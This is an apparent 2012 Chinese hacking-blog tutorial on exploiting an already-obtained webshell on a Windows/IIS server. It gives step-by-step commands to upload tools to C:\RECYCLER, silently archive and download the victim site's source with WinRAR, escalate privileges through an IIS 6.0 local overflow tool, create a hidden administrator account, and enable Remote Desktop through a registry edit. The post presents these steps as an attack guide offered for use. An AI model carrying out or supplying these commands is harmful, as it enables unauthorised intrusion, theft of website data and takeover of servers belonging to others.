webshell下打包网站的方法
发表时间:2012-4-18 评论:0 点击 5,277+
有时候拿下webshell后如果感觉网站还可以怎么打包源码呢,大多数webshell都有FSO打包,但是有时文件大了打不了包,那我们就可以试试windows下面的解压缩工具WinRAR来打包,WinRAR支持命令行操作。
如果服务器没有安装winRAR,那我们自己上传一个上去,上传到有可写权限的目录。
首先要看看wscript.shell √ 命令行执行组件要支持才能执行cmd命令。
如果服务器没有cmd文件,那么自己上传一个,如果服务器没有执行命令的权限。那么需要借用提权工具,和cmd一样上传到可写目录。
先随便执行一条命令试试看我的cmd上传到C:\RECYCLER\cmd.exe目录里
如果有权限可以直接执行
1: C:\ProgramFiles\WinRAR\WinRAR.exe a -ibck C:\RECYCLER\index2012zz.zip C:\xxx_sit2012\index2012zz
命令
其中C:\ProgramFiles\WinRAR\WinRAR.exe 为winRAR上传的绝对路径, a 为压缩 –ibck 为静默压缩,桌面不会有提示的,C:\RECYCLER\index2012zz.zip为压缩后文件的绝对路径,C:\xxx_sit2012\index2012zz为需要压缩的文件的绝对路径。
这里权限不够我们需要借助IIS6.0本地溢出漏洞来执行命令,那命令如下,其中i为工具上传路径
1: C:\RECYCLER\i.exe "C:\Program Files\WinRAR\WinRAR.exe a -ibck C:\RECYCLER\index2012zz.zip C:\xxx_sit2012\index2012zz"
命令执行完成,我们来到C:\RECYCLER\目录看看,成功压缩。
然后转移到网站根目录下载
可以下载了
几百M慢慢下吧 哈哈~
就这么简单,提取也是一个道理自不过命令不一样
如果需要提取执行以下命令创建账户
1: C:\RECYCLER\i.exe "net user admin admin /add"
2: C:\RECYCLER\i.exe "net localgroup administrators admin /add"
看看开3389了没,如果开了查看是否修改过端口。如果没开那就执行如下命令开3389
1: C:\RECYCLER\i.exe "REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f"
注意上面所有命令之间是一个空格。
好了就到这点,服务器是内外我就不提权了,哈哈~~
2
0